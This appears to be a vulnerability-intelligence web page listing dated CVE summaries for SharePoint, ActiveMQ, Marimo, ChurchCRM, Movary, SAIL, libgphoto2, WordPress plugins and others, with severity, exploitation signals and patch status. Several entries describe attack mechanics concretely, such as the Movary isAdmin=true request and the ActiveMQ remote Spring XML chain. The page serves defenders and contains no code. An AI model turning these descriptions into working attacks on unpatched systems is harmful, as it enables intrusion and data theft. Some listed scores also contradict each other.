THREAT ALERT

ACT NOW CVE-2026-32201 6.5 Improper input validation in Microsoft SharePoint Server enables network-based spoofing attacks without authentication, allowing attackers to forge communications and deceive users. Affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition. This vulnerability is confirmed actively exploited (CISA KEV) with publicly available exploit code, making it a critical operational priority despite the moderate CVSS score of 6.5. | ACT NOW CVE-2026-33825 7.8 Privilege escalation in Microsoft Defender Antimalware Platform versions before 4.18.26030.3011 allows authenticated local attackers to gain elevated system privileges through insufficiently granular access controls. CVSS 7.8 (High) reflects local attack vector requiring low privileges. EPSS score of 0.04% (12th percentile) indicates low probability of widespread exploitation. Microsoft has released a patched version (4.18.26030.3011) addressing the access control deficiency. | ACT NOW CVE-2026-32202 4.3 Windows Shell protection mechanism failure (CVE-2026-32202) allows remote attackers to perform spoofing attacks over a network without authentication, requiring only user interaction. This low-severity vulnerability affects multiple Windows versions from Windows 10 1607 through Windows 11 26H1 and Windows Server 2012 through 2025. While not actively exploited in the wild, vendor patches are available across all affected versions, and the low CVSS score (4.3) reflects limited confidentiality impact and no availability impact despite the network-accessible attack vector. | ACT NOW CVE-2026-34621 8.6 Prototype pollution in Adobe Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier enables arbitrary code execution in user context via malicious PDF files. Attack requires user interaction to open a crafted document. CVSS 9.6 (Critical) reflects network-deliverable code execution with scope change, though EPSS 0.24% (46th percentile) suggests moderate real-world exploitation probability. No public exploit identified at time of analysis. | ACT NOW CVE-2026-39987 9.3 Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/terminal/ws` WebSocket endpoint. The terminal handler skips authentication validation entirely, accepting connections without credential checks and spawning PTY shells directly. Attackers obtain full interactive shell access as root in default Docker deployments through a single WebSocket connection, bypassing Marimo's authentication middleware. No public exploit identified at time of analysis. | ACT NOW CVE-2026-34197 8.8 Remote code execution in Apache ActiveMQ Classic versions before 5.19.5 and 6.0.0-6.2.2 allows authenticated attackers to execute arbitrary code on the broker's JVM via Jolokia MBean operations. Attackers with low-privilege web console access can invoke BrokerService.addNetworkConnector() with a malicious discovery URI containing a VM transport brokerConfig parameter that loads remote Spring XML contexts, triggering bean instantiation and code execution through factory methods like Runtime.exec( | EMERGENCY CVE-2026-35616 9.8 Remote code execution in Fortinet FortiClientEMS versions 7.4.5 through 7.4.6 allows unauthenticated attackers to execute arbitrary code via crafted network requests. The vulnerability stems from improper access control (CWE-284) and requires no user interaction or privileges (CVSS PR:N). With a CVSS score of 9.1 (Critical) and low attack complexity, this represents a severe exposure for organizations using affected FortiClientEMS versions. The CVSS temporal metrics indicate functional exploit code exists (E:F) with an official fix available (RL:O), making this a high-priority patching target despite no confirmed active exploitation (not present in CISA KEV). | ACT NOW CVE-2026-5281 8.8 Remote code execution in Google Chrome prior to version 146.0.7680.178 via a use-after-free vulnerability in the Dawn graphics component allows attackers who have already compromised the renderer process to execute arbitrary code through a crafted HTML page. The vulnerability requires prior renderer compromise but results in full code execution with high severity per Chromium's security classification. | ACT NOW CVE-2026-3502 7.8 Arbitrary code execution in TrueConf Client allows authenticated attackers on adjacent networks to deliver malicious updates due to missing integrity verification. The auto-update mechanism accepts unsigned or unverified payloads, enabling man-in-the-middle attackers with high privileges to substitute trojanized updates that execute with the application's permissions. EPSS data not available; no confirmed active exploitation (not in CISA KEV); publicly available exploit code not identified at time of analysis. CVSS 7.8 reflects the adjacent network attack vector and user interaction requirement, reducing immediate internet-scale risk. | EMERGENCY CVE-2026-33634 9.4 Trivy security scanner v0.69.4 was compromised in a supply chain attack where a threat actor used stolen credentials to publish malicious releases and force-push credential-stealing malware to GitHub Actions repositories. | EMERGENCY CVE-2026-3055 9.3 An insufficient input validation vulnerability exists in Citrix NetScaler ADC and NetScaler Gateway when configured as a SAML Identity Provider, allowing attackers to trigger a memory overread condition. The vulnerability affects both the NetScaler ADC and NetScaler Gateway products across multiple versions, and successful exploitation could lead to information disclosure by reading adjacent memory contents. While no CVSS score or EPSS data is currently published, the CWE-125 classification (Out-of-bounds Read) combined with the SAML IDP configuration context suggests moderate to high real-world risk for organizations relying on these devices for identity management. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Get CVEs that hit your stack — not 200/day

Pick your technologies, get a weekly digest by email. Free, no spam.

React Python Postgres +200 more

React Next.js Python Postgres AWS +200 more

Trending Now See all

Critical Watch See all

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Incoming 20

Pre-NVD – not yet scored

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — April 18, 2026

51 CVEs tracked today. 8 Critical, 16 High, 23 Medium, 4 Low.

CVE-2026-41242 CRITICAL CVSS 9.4
Code injection vulnerability in protobufjs (JavaScript protobuf library) allows authenticated attackers to execute arbitrary JavaScript code during protobuf object decoding by injecting malicious payloads into 'type' fields of protobuf definitions. Affects all versions before 7.5.5 and 8.0.1. CVSS 9.4 (Critical) reflects chained impact across multiple security boundaries (VC:H/VI:H/VA:H/SC:H/SI:H/SA:H), though exploitation requires authenticated access (PR:L) to inject malicious protobuf definitions. No active exploitation confirmed (not in CISA KEV); vendor-released patches available.

RCE Code Injection Red Hat
CVE-2026-40582 CRITICAL CVSS 9.1
Authentication bypass in ChurchCRM versions prior to 7.2.0 allows remote unauthenticated attackers to obtain valid API keys by submitting credentials directly to the /api/public/user/login endpoint, circumventing account lockout policies and two-factor authentication enforcement. Attackers with stolen or compromised passwords can gain full API access with the victim's privileges even when the account is locked or protected by 2FA. CVSS 9.1 critical severity. Fixed in version 7.2.0 via GitHub commit 214694eb and PR #8607. No CISA KEV listing or public exploit code identified at time of analysis, though the vulnerability class (CWE-288: Authentication Bypass) is well-understood and straightforward to exploit once credentials are obtained through phishing, credential stuffing, or database leaks.

Authentication Bypass
CVE-2026-40572 CRITICAL CVSS 9.0
Privilege escalation in NovumOS versions prior to 0.24 allows local unprivileged attackers to gain kernel-level execution by manipulating core kernel structures. The vulnerable Syscall 15 (MemoryMapRange) permits user-mode processes to map arbitrary virtual memory regions, including protected kernel areas (IDT, GDT, TSS, page tables), enabling modification of interrupt handlers for privilege elevation. CISA SSVC framework confirms POC availability with total technical impact, though EPSS exploitation probability remains very low (0.01%, 2nd percentile), indicating research-phase discovery rather than widespread targeting. No CISA KEV listing at time of analysis. Vendor-released patch available in version 0.24.

Privilege Escalation
CVE-2026-40494 CRITICAL CVSS 9.8
Heap buffer overflow in SAIL image library's TGA decoder allows remote code execution via malformed RLE-compressed TGA files against all versions prior to commit 45d48d1. Network-accessible applications processing untrusted TGA images can be fully compromised without authentication or user interaction (CVSS 9.8). The raw-packet RLE decompression path permits writing up to 496 bytes of attacker-controlled data beyond allocated heap bounds. Vendor patch confirmed via GitHub commit 45d48d1f2e8e0d73e80bc1fd5310cb57f4547302. No CISA KEV listing or public POC identified at time of analysis, but the straightforward exploitation conditions (parsing untrusted files) and complete technical disclosure create high weaponization risk.

Buffer Overflow Memory Corruption
CVE-2026-40493 CRITICAL CVSS 9.8
Heap buffer overflow in SAIL PSD codec allows remote code execution when processing malicious LAB-mode PSD files. Affects all SAIL versions prior to commit c930284 (HappySeaFox/sail). Attackers can achieve arbitrary code execution (CVSS 9.8: AV:N/AC:L/PR:N/UI:N) by triggering a mismatch between computed bytes-per-pixel (6 bytes for 3-channel 16-bit LAB) and allocated buffer size (5 bytes for BPP40_CIE_LAB format). Every pixel write deterministically overflows the heap buffer. EPSS data not available. Not listed in CISA KEV. Patch available via GitHub commit c930284445ea3ff94451ccd7a57c999eca3bc979.

Buffer Overflow Memory Corruption
CVE-2026-40492 CRITICAL CVSS 9.8
Out-of-bounds memory access in SAIL image library's XWD codec allows remote attackers to achieve arbitrary code execution via malformed image files. The vulnerability stems from a pixel format mismatch where buffer allocation uses pixmap_depth=8 (1 byte/pixel) but byte-swap operations use bits_per_pixel=32 (4 bytes/pixel), causing 4x buffer overrun. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) indicates trivial exploitation requiring only delivery of a crafted XWD file. EPSS data unavailable; no KEV listing indicates targeted rather than widespread exploitation. Fix available in commit 36aa5c7ec8a2bb35f6fb867a1177a6f141156b02.

Buffer Overflow Memory Corruption
CVE-2026-40484 CRITICAL CVSS 9.1
Remote code execution in ChurchCRM <7.2.0 allows authenticated administrators to upload PHP webshells through the database backup restore function, which copies files from archive Images/ directories to web-accessible paths without extension filtering. The vulnerability includes a CSRF bypass enabling forced exploitation through cross-site request forgery. Exploitation requires high privileges (administrator account) but is network-accessible with low complexity (CVSS:3.1/AV:N/AC:L/PR:H). No active exploitation confirmed (not in CISA KEV). Vendor-released fix available in version 7.2.0 via GitHub PR #8610 and commit 68be1d12.

PHP Privilege Escalation RCE CSRF
CVE-2026-40317 CRITICAL CVSS 9.3
Syscall 12 (JumpToUser) in NovumOS versions prior to 0.24 executes arbitrary kernel code at Ring 0 privilege when invoked by unprivileged Ring 3 user-mode processes. The vulnerability stems from missing address validation on user-supplied entry points, enabling local privilege escalation from user mode to kernel mode with complete system control. CISA SSVC framework confirms publicly available exploit code (POC status) with total technical impact, though EPSS score remains low at 0.02% (5th percentile), suggesting limited real-world targeting of this niche custom operating system despite the severe technical flaw.

Privilege Escalation RCE
CVE-2026-40880 HIGH CVSS 7.2
Consensus-breaking cache logic error in Zcash Zebra node software (all versions <4.3.1) allows malicious miners to partition the network by mining blocks containing height-invalid transactions. By submitting a transaction valid at height H+1 but invalid at H+2, then mining it into block H+2 and submitting that block before H+1, attackers trigger cached verification bypass-vulnerable Zebra nodes accept the invalid block while honest nodes reject it, creating a consensus split. This enables double-spend attacks against isolated nodes. EPSS data unavailable; not in CISA KEV. Classified as CWE-1025 (comparison logic error). Fixed in Zebra 4.3.1 by removing the risky cache optimization entirely.

Authentication Bypass
CVE-2026-40581 HIGH CVSS 8.1
Cross-Site Request Forgery (CSRF) in ChurchCRM versions before 7.2.0 allows remote attackers to permanently delete family records and all associated data (notes, pledges, persons, property) through the SelectDelete.php endpoint. The endpoint executes irreversible deletions via unauthenticated GET requests without CSRF token validation, requiring only that an authenticated administrator visit a malicious page. Attackers can weaponize this via phishing emails or malicious websites to trigger silent data destruction. Fixed in version 7.2.0 via PR #8613 and commit 3936162. No KEV listing or public POC identified at time of analysis, though exploitation is trivial given the simplicity of CSRF attacks against GET endpoints.

PHP CSRF
CVE-2026-40489 HIGH CVSS 8.6
Stack-based buffer overflow in editorconfig-core-c library (versions ≤0.12.10) enables local attackers to crash applications or potentially execute arbitrary code via maliciously crafted .editorconfig files and directory structures. This incomplete fix for CVE-2023-0341 left the l_pattern[8194] stack buffer unprotected while only addressing the pcre_str buffer in version 0.12.6. Patched in version 0.12.11. No active exploitation confirmed (not in CISA KEV), but publicly exploitable with local access and minimal complexity (CVSS AV:L/AC:L/PR:N).

Buffer Overflow Stack Overflow Ubuntu
CVE-2026-40487 HIGH CVSS 8.9
File upload validation bypass in Postiz social media scheduler (versions before 2.21.6) allows authenticated users to upload executable file types (HTML, SVG) with spoofed Content-Type headers, achieving stored XSS when nginx serves files using their original extensions. Attackers can hijack sessions and take over other user accounts. CVSS 8.9 (High) reflects network attack vector with low complexity requiring only low-privilege authentication and user interaction. EPSS data not provided. Not listed in CISA KEV. Vendor patch released in version 2.21.6.

XSS Nginx File Upload
CVE-2026-40482 HIGH CVSS 7.1
SQL injection in ChurchCRM's FinancialService getMemberByScanString() method allows authenticated attackers to exfiltrate sensitive database contents and modify limited data. Affects ChurchCRM versions prior to 7.2.0. The vulnerability stems from unsanitized $routeAndAccount parameter concatenated directly into SQL queries without parameterization. Fixed via commit 214694eb and pull request #8607. EPSS data not available. Not listed in CISA KEV. Public exploit code exists (GitHub advisory GHSA-hc37-vx3w-34fg with PoC). CVSS 7.1 reflects network-accessible attack requiring low-privileged authentication with high confidentiality impact and low integrity impact.

SQLi
CVE-2026-40480 HIGH CVSS 7.1
Broken object-level authorization in ChurchCRM 7.1.x and earlier allows authenticated users with minimal EditSelf privileges to enumerate and exfiltrate sensitive personal data (names, addresses, phone numbers, emails) of all church members via the unauthenticated GET /api/person/{personId} API endpoint. While legacy UI enforces canEditPerson() checks, the API layer completely omits these authorization controls, enabling horizontal privilege escalation. Fixed in version 7.2.0. CVSS 7.1 (AV:N/AC:L/PR:L) indicates network-accessible exploitation by any low-privileged authenticated user with no technical complexity. EPSS data unavailable; no KEV listing or public POC identified at time of analysis, though the fix commit and GitHub advisory provide full technical details for replication.

PHP Authentication Bypass
CVE-2026-40350 HIGH CVSS 8.8
Privilege escalation in Movary (self-hosted movie tracking app) versions before 0.71.1 allows any authenticated user to create administrator accounts and access user-management functions. The vulnerability stems from missing middleware enforcement and a broken boolean condition in authorization checks for /settings/users endpoints. Attack requires only low-privilege authenticated access (CVSS PR:L) with no user interaction (UI:N), enabling complete system takeover (C:H/I:H/A:H). Vendor has released patch version 0.71.1. No public exploit identified at time of analysis, but exploitation is trivial given the simple bypass mechanism.

Authentication Bypass
CVE-2026-40349 HIGH CVSS 8.8
Authenticated users in Movary (self-hosted movie tracking web app) can escalate privileges to administrator via a missing authorization check in the user settings endpoint. By sending a crafted PUT request to `/settings/users/{userId}` with `isAdmin=true` for their own user ID, low-privilege users gain full administrative access. Movary versions prior to 0.71.1 are affected. Vendor-released patch version 0.71.1 available. EPSS data not provided; no CISA KEV listing identified. GitHub references include security advisory GHSA-mcfq-8rx7-w25v and fix commit 12c8a090.

Authentication Bypass
CVE-2026-40348 HIGH CVSS 7.7
Server-Side Request Forgery in Movary movie tracking application allows authenticated users to probe internal networks and metadata endpoints. The /settings/jellyfin/server-url-verify endpoint accepts user-controlled URLs without validating against private IP ranges, enabling internal reconnaissance through the server's context. Affects all versions prior to 0.71.1. EPSS data not available, but exploitation requires only low-privilege authentication (CVSS PR:L) with no attack complexity, making this readily exploitable by any registered user. Upstream fix confirmed in version 0.71.1 via GitHub commit d459b35.

SSRF
CVE-2026-35465 HIGH CVSS 7.5
Path traversal in SecureDrop Client 0.17.4 and below allows a compromised SecureDrop Server to execute arbitrary code on journalist workstations by injecting malicious filenames during gzip archive extraction. The vulnerability enables overwriting the SQLite database and other critical files in the sd-app VM, potentially exposing decrypted source submissions. Fixed in version 0.17.5. No active exploitation confirmed (not in CISA KEV). CVSS 7.5 reflects high impact but complex attack chain requiring prior server compromise and user interaction. EPSS data not available, but real-world risk is constrained by the requirement to first breach a Tor-hidden, hardened server infrastructure.

RCE
CVE-2026-32228 HIGH CVSS 7.5
Apache Airflow 3.0.x prior to 3.2.0 allows remote unauthenticated attackers to trigger unauthorized DAG (Directed Acyclic Graph) execution via the UI or API, bypassing asset materialize permission checks. Despite CVSS 7.5 HIGH, the CVSS vector (PR:N) contradicts the description's requirement for 'UI/API user with asset materialize permission', suggesting authentication IS required-a critical discrepancy that demands verification. EPSS of 0.01% (3rd percentile) indicates minimal observed exploitation activity. Vendor-released patch available in Airflow 3.2.0 per Apache advisory.

Authentication Bypass
CVE-2026-30912 HIGH CVSS 7.5
Apache Airflow before 3.2.0 exposes SQL exception stack traces through API responses despite api/expose_stack_traces=false configuration, allowing remote unauthenticated attackers to enumerate database schema details, table names, query structure, and internal filesystem paths. CVSS 7.5 (High) with network vector and no authentication required. EPSS score of 0.02% (4th percentile) indicates low probability of widespread exploitation. Vendor patch available in Airflow 3.2.0 per Apache advisory. No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis.

Apache Information Disclosure
CVE-2026-30898 HIGH CVSS 8.8
Command injection in Apache Airflow's BashOperator documentation example allows authenticated attackers to escalate privileges from UI user to worker-level code execution. Affects all Airflow versions before 3.2.0. The vulnerability stems from documentation suggesting unsafe handling of dag_run.conf parameters, which organizations may have replicated in production DAGs. EPSS score of 0.03% indicates low observed exploitation probability, though the upstream fix (PR #64129) demonstrates vendor acknowledgment and remediation.

Command Injection
CVE-2026-25917 HIGH CVSS 7.2
Deserialization vulnerability in Apache Airflow webserver (all versions before 3.2.0) allows network-accessible attackers to execute arbitrary code by injecting malicious XCom payloads, despite vendor-assigned Low severity due to the trusted Dag Author threat model. CVSS 9.8 Critical rating reflects unauthenticated network-based RCE capability (AV:N/PR:N), contradicting the description's trust assumption. EPSS 0.07% (22nd percentile) suggests low immediate exploitation likelihood. No active exploitation confirmed; vendor patch available in version 3.2.0 with public GitHub PR.

RCE Apache Deserialization
CVE-2026-6518 HIGH CVSS 8.8
Remote code execution in CMP - Coming Soon & Maintenance Plugin by NiteoThemes for WordPress (versions ≤4.1.16) allows authenticated attackers with Administrator-level privileges to upload and execute arbitrary PHP code via a malicious ZIP file. The vulnerability stems from insufficient capability checking (publish_pages instead of manage_options) and absent file validation in the cmp_theme_update_install AJAX action. CVSS 8.8 reflects high impact across confidentiality, integrity, and availability. No CISA KEV listing or public exploit code identified at time of analysis, suggesting limited real-world exploitation despite the high severity rating. Wordfence Threat Intelligence disclosed this vulnerability with detailed source code references.

WordPress RCE File Upload
CVE-2026-2262 HIGH CVSS 7.5
Unauthenticated information disclosure in WordPress Easy Appointments plugin ≤3.12.21 exposes customer appointment data via unprotected REST API endpoint. Remote attackers without authentication can extract full names, email addresses, phone numbers, IP addresses, appointment descriptions, and pricing information through `/wp-json/wp/v2/eablocks/ea_appointments/`. CVSS score 7.5 (High) with EPSS data not yet available. Patch released in version 3.12.22 per WordPress plugin repository changeset. No active exploitation confirmed (not in CISA KEV), but the trivial exploit complexity (AV:N/AC:L/PR:N/UI:N) and privacy impact make this a priority for sites handling sensitive appointment data.

WordPress Information Disclosure
CVE-2026-41254 MEDIUM CVSS 4.0
Integer overflow in Little CMS (lcms2) version 2.18 and earlier allows local attackers to trigger a buffer overflow via CubeSize calculation in cmslut.c, where the overflow check occurs after rather than before multiplication. This can result in memory corruption leading to information disclosure or denial of service with low complexity requirements. No active exploitation in CISA KEV confirmed at time of analysis, but proof-of-concept technical details are publicly available.

Buffer Overflow Suse
CVE-2026-41253 MEDIUM CVSS 6.9
Remote code execution in iTerm2 through version 3.6.9 allows local attackers to execute arbitrary code by displaying a specially crafted text file when a malicious file with a conductor-protocol-compatible name exists in the working directory. The vulnerability exploits iTerm2's acceptance of SSH conductor protocol sequences (DCS 2000p and OSC 135) from terminal output without validating the source, enabling in-band signaling abuse where filenames themselves become attack vectors. CVSS 6.9 reflects local attack vector and high complexity, but practical exploitation requires user interaction (opening a file) combined with directory-resident malware.

RCE
CVE-2026-41078 MEDIUM CVSS 5.9
OpenTelemetry.Exporter.Jaeger allows memory exhaustion and denial of service when processing high-cardinality or attacker-influenced telemetry data due to pooled list structures that retain oversized allocations across subsequent requests. The affected .NET NuGet package may experience sustained memory pressure if telemetry attributes or events contain large payloads, particularly in environments where input originates from untrusted sources and memory limits are increased from defaults. Notably, this deprecated exporter (end-of-support since 2023) will not receive vendor patches and users should migrate to maintained alternatives such as OpenTelemetry Protocol (OTLP) exporters.

Denial Of Service
CVE-2026-40948 MEDIUM CVSS 5.4
Session fixation and login-CSRF in apache-airflow-providers-keycloak prior to 0.7.0 allows remote attackers without prior authentication to hijack user sessions by delivering a crafted OAuth callback URL, enabling credential theft from stored Airflow connections. The vulnerability stems from missing OAuth 2.0 state parameter validation and lack of PKCE implementation, requiring only user interaction to trick victims into clicking a malicious link. EPSS score of 0.01% suggests minimal real-world exploitation despite moderate CVSS impact rating.

Apache CSRF
CVE-2026-40881 MEDIUM CVSS 6.3
Zebra cryptocurrency node prior to version 4.3.1 allocates excessive memory (up to 233,016 addresses) when deserializing addr/addrv2 protocol messages, even though the specification limits messages to 1,000 addresses. An attacker can trigger out-of-memory crashes by sending multiple oversized address messages over different connections. This is a network-accessible denial of service vulnerability affecting all Zebra versions before 4.3.1, with no public exploit code identified but straightforward to execute given the protocol specification.

Denial Of Service Deserialization
CVE-2026-40593 MEDIUM CVSS 4.8
Stored cross-site scripting in ChurchCRM UserEditor.php prior to version 7.2.0 allows authenticated administrators to inject malicious HTML and JavaScript into username fields, which then executes in the browsers of other administrators viewing the user editor page. The vulnerability stems from failure to sanitize usernames before rendering them into HTML input value attributes, and exploitation requires administrator-level privileges combined with user interaction (another admin viewing the compromised user's editor). This is a low-CVSS but real privilege-escalation concern within multi-administrator deployments, particularly where administrators may have differing trust levels.

PHP XSS
CVE-2026-40491 MEDIUM CVSS 6.5
gdown prior to version 5.2.2 allows remote attackers to write arbitrary files outside the intended extraction directory via maliciously crafted ZIP or TAR archives due to insufficient path traversal validation in the extractall functionality. An attacker can craft a malicious archive with path traversal sequences (e.g., ../ entries) in filenames, which when extracted by a user, permits file overwrite and potential remote code execution. The vulnerability requires user interaction (UI:R) to trigger extraction but affects all unauthenticated remote users downloading via the gdown library.

RCE Path Traversal Google
CVE-2026-40490 MEDIUM CVSS 6.8
AsyncHttpClient (AHC) library prior to versions 3.0.9 and 2.14.5 leaks Authorization, Proxy-Authorization headers, and plaintext Realm credentials to arbitrary redirect targets when followRedirect(true) is enabled, affecting all Java applications using vulnerable versions. This occurs across domain, scheme, and port changes including HTTPS-to-HTTP downgrades. An attacker controlling a redirect destination via open redirect, DNS rebinding, or MITM can capture Bearer tokens, Basic auth credentials, or any Authorization header value. No public exploit code or active exploitation has been confirmed at analysis time, though the vulnerability is exploitable with high-confidence conditions when redirect following is enabled (CVSS 6.8, network vector, no authentication required).

Java Information Disclosure Open Redirect Red Hat
CVE-2026-40485 MEDIUM CVSS 5.3
ChurchCRM versions prior to 7.2.0 leak valid usernames through the public API login endpoint by returning distinguishable HTTP status codes (404 for non-existent users, 401 for valid users with wrong passwords). An unauthenticated attacker can enumerate valid usernames without rate limiting or account lockout restrictions, enabling targeted credential attacks and social engineering. This information disclosure vulnerability affects all ChurchCRM deployments using the vulnerable API endpoint and has been patched in version 7.2.0.

Information Disclosure
CVE-2026-40483 MEDIUM CVSS 5.4
ChurchCRM versions prior to 7.2.0 allow authenticated users with Finance permissions to store malicious JavaScript in pledge donation comments via missing HTML escaping, which executes in the browsers of any subsequent users who edit the pledge record, resulting in stored cross-site scripting (XSS). The vulnerability requires Finance role access and victim interaction (opening the pledge editor), but affects all users who view the compromised record, with no known public exploit code or active exploitation confirmed at time of analysis.

XSS
CVE-2026-40340 MEDIUM CVSS 6.1
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical access to a USB-connected camera to trigger information disclosure or denial of service via malformed PTP protocol data during Samsung Galaxy device enumeration. The vulnerability exists in `ptp_unpack_OI()` which validates buffer boundaries at 48 bytes but subsequently reads up to 56 bytes, exceeding the boundary by 9 bytes. A fix is available in commit 7c7f515bc88c3d0c4098ac965d313518e0ccbe33.

Buffer Overflow Information Disclosure Samsung Red Hat Suse
CVE-2026-40339 MEDIUM CVSS 5.2
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical access to a connected camera to read sensitive memory and potentially cause denial of service via a specially crafted Sony camera device. The vulnerability exists in the Sony-specific PTP packet unpacking function which omits bounds validation present in the standard variant, enabling attackers with direct camera access to trigger information disclosure and minor availability impact.

Buffer Overflow Information Disclosure Red Hat Suse
CVE-2026-40338 MEDIUM CVSS 5.2
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows physical attackers to disclose sensitive memory and cause denial of service via a malicious PTP (Picture Transfer Protocol) device. The vulnerability exists in the Sony-specific DPD unpacking function, which fails to validate buffer boundaries before reading an enumeration count, enabling attackers with direct device access to craft responses that trigger the out-of-bounds read. Patch is available via upstream commit 3b9f9696be76ae51dca983d9dd8ce586a2561845.

Buffer Overflow Information Disclosure Red Hat Suse
CVE-2026-40337 MEDIUM CVSS 5.1
Sentry kernel prior to version 0.4.7 allows tasks with DEV or IO capabilities to manipulate another task's IRQ line via the __sys_int_* syscall family, enabling denial of service and covert information channels between privileged tasks and external systems. The vulnerability affects embedded systems using Sentry micro-kernel versions before 0.4.7, and no public exploit code has been identified at time of analysis, though the fix is vendor-released and publicly available.

Information Disclosure
CVE-2026-40335 MEDIUM CVSS 5.2
Out-of-bounds read in libgphoto2 versions up to 2.5.33 in the PTP protocol parser allows information disclosure and potential denial of service when processing specially crafted camera responses. The vulnerability exists in ptp_unpack_DPV() where UINT128 and INT128 cases advance the buffer offset by 16 bytes without verifying sufficient buffer remains available, potentially exposing adjacent memory. Exploitation requires physical access to connect a malicious camera device (AV:P), but no special authentication or user interaction is needed once connected. No public exploit code identified at time of analysis.

Buffer Overflow Information Disclosure Red Hat Suse
CVE-2026-40333 MEDIUM CVSS 6.1
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical access to a connected camera to read sensitive information from process memory or cause denial of service via malformed EOS event data. Two functions in ptp-pack.c lack length validation, enabling unbounded buffer reads when processing camera events. The vulnerability requires physical device access and is not remotely exploitable, with no public exploit code identified at time of analysis.

Buffer Overflow Information Disclosure Red Hat Suse
CVE-2026-6048 MEDIUM CVSS 6.4
Stored XSS in Flipbox Addon for Elementor WordPress plugin (versions ≤2.1.1) allows authenticated authors to inject malicious scripts via the button URL custom_attributes field due to insufficient validation of attribute names. The vulnerability uses esc_html() on attribute names, which fails to block event handler attributes like onmouseover and onclick, enabling arbitrary JavaScript execution in pages viewed by any user. CVSS 6.4 reflects the requirement for authenticated author-level access, but the stored nature and cross-site scope increase practical risk. Patch available in version 2.1.2.

WordPress XSS
CVE-2026-4801 MEDIUM CVSS 6.4
Stored Cross-Site Scripting in CoBlocks Page Builder plugin for WordPress allows authenticated Contributor-level users to inject malicious scripts via external iCal feed data in the Events block, executing arbitrary JavaScript in pages visited by any user. The vulnerability exists in all versions through 3.1.16 due to insufficient output escaping of event titles, descriptions, and locations. CVSS 6.4 reflects limited direct impact (confidentiality and integrity) but broad scope across WordPress installations, and no public exploit code or active exploitation has been confirmed at this time.

WordPress XSS
CVE-2026-2986 MEDIUM CVSS 6.4
Stored Cross-Site Scripting in Contextual Related Posts plugin for WordPress (versions up to 4.2.1) allows authenticated contributors and above to inject malicious scripts via the 'other_attributes' parameter, which execute in the browsers of all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping, enabling privilege escalation from contributor-level access to site-wide code execution. No active exploitation in the wild has been confirmed, but the attack requires only authenticated access at a low privilege level that is commonly granted in WordPress environments.

WordPress XSS
CVE-2026-2505 MEDIUM CVSS 5.4
Stored Cross-Site Scripting in Categories Images WordPress plugin versions up to 3.3.1 allows authenticated contributors and above to inject malicious scripts via the 'class' attribute of the 'z_taxonomy_image' shortcode, which executes in the context of other users viewing the affected page. The vulnerability stems from insufficient HTML escaping in the shortcode's fallback image builder. No public exploit code or active exploitation has been identified, but the attack requires only authenticated contributor-level access and user interaction with the injected content.

WordPress XSS
CVE-2026-1838 MEDIUM CVSS 6.1
Reflected XSS in Hostel WordPress plugin versions up to 1.1.6 allows unauthenticated attackers to inject arbitrary JavaScript via the 'shortcode_id' parameter, requiring user interaction (clicking a malicious link) to execute. The vulnerability stems from insufficient input sanitization and output escaping in the shortcode handling code. No public exploit code or active exploitation has been identified at time of analysis.

WordPress XSS
CVE-2026-1559 MEDIUM CVSS 6.4
Youzify plugin for WordPress (versions up to 1.3.6) allows authenticated subscribers to execute stored cross-site scripting attacks via the 'checkin_place_id' parameter due to insufficient input sanitization and output escaping. An attacker with subscriber-level access can inject arbitrary JavaScript that executes when other users view the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been identified at the time of this analysis.

WordPress XSS
CVE-2026-0894 MEDIUM CVSS 6.4
Stored Cross-Site Scripting in Content Blocks (Custom Post Widget) plugin for WordPress affects all versions up to 3.3.9, allowing authenticated contributors and above to inject arbitrary JavaScript via the content_block shortcode that executes in the browsers of all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping; no public exploit code or active exploitation has been identified at the time of analysis, but the low attack complexity and broad scope (cross-site) make this a significant risk for WordPress sites with untrusted contributor accounts.

WordPress XSS
CVE-2026-40341 LOW CVSS 3.5
Out-of-bounds read in libgphoto2 versions up to 2.5.33 allows local attackers with physical USB access to crash the library via malformed PTP protocol data from untrusted camera devices, affecting applications using libgphoto2 for camera enumeration and control on desktop systems.

Buffer Overflow
CVE-2026-40336 LOW CVSS 2.4
libgphoto2 versions up to 2.5.33 leak memory in the Sony camera property descriptor parser when processing secondary enumeration lists from 2024+ Sony cameras, causing denial of service through resource exhaustion on systems with repeated camera enumeration or property descriptor parsing. The vulnerability requires physical access to a Sony camera or crafted USB device communication, affecting users who interact with affected Sony camera models via libgphoto2. Vendor-released patch: version 2.5.34 and later.

Information Disclosure
CVE-2026-40334 LOW CVSS 3.5
Missing null terminator in libgphoto2's ptp_unpack_Canon_FE() function allows out-of-bounds memory reads when processing Canon camera filenames. Versions up to 2.5.33 are vulnerable when a 13-byte filename without null termination is supplied, causing subsequent string operations to read beyond buffer boundaries. The vulnerability requires physical camera access and results in information disclosure or denial of service, not remote code execution.

Buffer Overflow
CVE-2026-32690 LOW CVSS 3.7
Apache Airflow 3.0.0 through 3.1.x fails to redact secrets stored as nested fields within JSON-formatted variables, allowing authenticated users with variable access to retrieve plaintext sensitive values. This information disclosure vulnerability affects deployments that store credentials or API keys as JSON dictionary structures in Airflow variables. The EPSS score of 0.02% and CVSS 3.7 with high attack complexity reflect limited real-world exploitation likelihood, but the vulnerability poses direct risk to organizations using JSON-structured secrets without additional access controls.

Apache Information Disclosure

